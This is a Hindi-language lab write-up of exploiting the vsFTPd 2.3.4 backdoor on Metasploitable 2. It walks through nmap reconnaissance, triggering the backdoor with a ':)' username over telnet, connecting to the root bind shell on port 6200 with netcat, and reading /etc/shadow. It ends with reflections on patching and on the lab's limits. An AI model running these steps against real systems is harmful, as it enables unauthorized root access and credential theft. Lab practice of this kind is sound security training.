
परियोजना: Metasploitable 2 पर vsFTPd 2.3.4 बैकडोर शोषण (CVE-2011-2523)
यह परियोजना एक जानबूझकर कमजोर मशीन, Metasploitable 2 के विरुद्ध पैनेट्रेशन टेस्टिंग वर्कफ़्लो को प्रदर्शित करती है। उद्देश्य FTP सेवा में एक ज्ञात कमजोरी की पहचान करना, उसका शोषण करना और उसका विश्लेषण करना था, अंततः रूट-स्तरीय पहुँच प्राप्त करना और सुरक्षा प्रभाव का आकलन करना।
192.168.56.0/24)लक्ष्य प्रणाली और उसके नेटवर्क कॉन्फ़िगरेशन को सत्यापित किया गया:
whoami
hostname
ifconfig

हमलावर और लक्ष्य के बीच नेटवर्क कनेक्टिविटी की पुष्टि की गई:
ping 192.168.56.101

vsFTPd 2.3.4) का पता लगायाहोस्ट खोज की गई:
nmap -sn 192.168.56.0/24
नेटवर्क पर सक्रिय होस्ट की पहचान की गई।

nmap 192.168.56.101
कई खुले पोर्ट खोजे गए, जिनमें शामिल हैं:

nmap -sV 192.168.56.101
चल रही FTP सेवा की पहचान की गई:
vsFTPd 2.3.4
एक पूर्ण सेवा और स्क्रिप्ट-आधारित स्कैन सहायक फ़ाइलों में शामिल है: Nmap स्कैन आउटपुट।

FTP सेवा एक ज्ञात कमजोर संस्करण चला रही थी:
vsFTPd 2.3.4
vsFTPd का यह संस्करण एक दुर्भावनापूर्ण बैकडोर के साथ वितरित किया गया था जो प्रमाणीकरण के दौरान :) युक्त उपयोगकर्ता नाम का उपयोग करने पर ट्रिगर होता है। सक्रिय होने पर, सेवा पोर्ट 6200 पर एक बाइंड शेल खोलती है, जो अनधिकृत दूरस्थ पहुँच की अनुमति देती है।
Telnet का उपयोग करके बैकडोर को ट्रिगर किया गया:
telnet 192.168.56.101 21
USER test:)
PASS test

Netcat का उपयोग करके बैकडोर से कनेक्ट किया गया:
nc 192.168.56.101 6200

whoami
root
रूट पहुँच सफलतापूर्वक प्राप्त हुई

रूट पहुँच प्राप्त करने के बाद, बुनियादी सिस्टम गणना की गई:
cat /etc/passwd
cat /etc/shadow
/etc/shadow से हैश की गई क्रेडेंशियल्स प्राप्त की गईं

यह प्रयोगशाला दर्शाती है कि कैसे एक एकल कमजोर सेवा पूर्ण सिस्टम समझौते का कारण बन सकती है। यह उचित सेवा कॉन्फ़िगरेशन, पैच प्रबंधन, और उजागर हमले की सतहों को कम करने के महत्व पर प्रकाश डालती है।
यह पहली बार था जब मैंने मैन्युअल रूप से एक वास्तविक दुनिया के बैकडोर का शोषण किया। मैंने सीखा कि कैसे एक एकल दुर्भावनापूर्ण उपयोगकर्ता नाम स्ट्रिंग (:)) रूट-स्तरीय पहुँच को ट्रिगर कर सकती है, जिसने इस बात को मजबूत किया कि टोही में सेवा गणना और संस्करण पहचान क्यों मायने रखती है। मैं बुनियादी Linux पोस्ट-एक्सप्लॉइटेशन कमांड्स, जैसे /etc/shadow पढ़ना और यह समझना कि हैश की गई क्रेडेंशियल्स वास्तव में कैसी दिखती हैं, में अधिक सहज हो गया।
यह Metasploitable 2 का उपयोग करके एक नियंत्रित प्रयोगशाला वातावरण था, एक जानबूझकर कमजोर मशीन। vsFTPd 2.3.4 बैकडोर एक ज्ञात CVE (CVE-2011-2523) है जो 2011 से है, इसलिए यह आधुनिक वास्तविक दुनिया की व्यस्तता को प्रतिबिंबित नहीं करता है। एक वास्तविक मूल्यांकन में, चोरी, लॉगिंग बायपास, या पिवोटिंग जैसे अतिरिक्त कदमों की आवश्यकता होगी। यह परियोजना मुख्य शोषण यांत्रिकी को समझने पर केंद्रित थी, न कि पूर्ण पैनेट्रेशन टेस्ट पर।